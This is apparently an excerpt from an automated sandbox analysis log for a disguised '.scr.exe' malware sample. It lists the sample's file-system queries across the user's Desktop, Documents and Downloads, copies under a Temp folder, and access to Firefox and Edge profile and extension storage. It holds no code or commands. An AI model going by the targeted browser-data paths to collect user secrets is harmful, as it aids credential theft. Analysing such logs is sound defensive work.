Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\TQDFJHPUIU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\TQDFJHPUIU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\PALRGUCVEH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\TQDFJHPUIU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\ZGGKNSUKOP.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\DUUDTUBZFW.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EOWRVPQCCS.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Queries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
